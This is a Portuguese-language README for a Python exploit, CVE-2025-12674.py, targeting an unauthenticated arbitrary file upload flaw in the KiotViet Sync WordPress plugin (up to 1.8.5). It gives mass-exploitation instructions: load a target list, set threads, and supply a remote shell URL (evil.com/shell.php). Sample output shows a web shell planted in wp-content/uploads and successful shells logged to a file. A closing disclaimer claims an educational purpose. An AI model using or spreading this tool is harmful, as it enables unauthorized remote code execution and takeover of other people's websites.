
KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado
KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado
O plugin KiotViet Sync para WordPress (versões até e incluindo 1.8.5) é vulnerável a uploads arbitrários de arquivos, devido à falta de validação do tipo de arquivo na função create_media().
Essa vulnerabilidade permite que atacantes não autenticados façam upload de arquivos arbitrários para o servidor, o que pode levar à execução remota de código.
Clone este repositório ou baixe o script.
Prepare seus alvos:
Coloque um alvo por linha em um arquivo chamado list.txt.
example.com
site2.com
http://site3.com
Execute o script de exploração:
O nome do script é:
CVE-2025-12674.py
python3 CVE-2025-12674.py
Quando solicitado, insira suas opções:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt.Este script é fornecido apenas para fins educacionais e de testes de segurança autorizados.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.
O autor não se responsabiliza por uso indevido ou por qualquer dano causado.
Nxploited (Khaled Alenazi)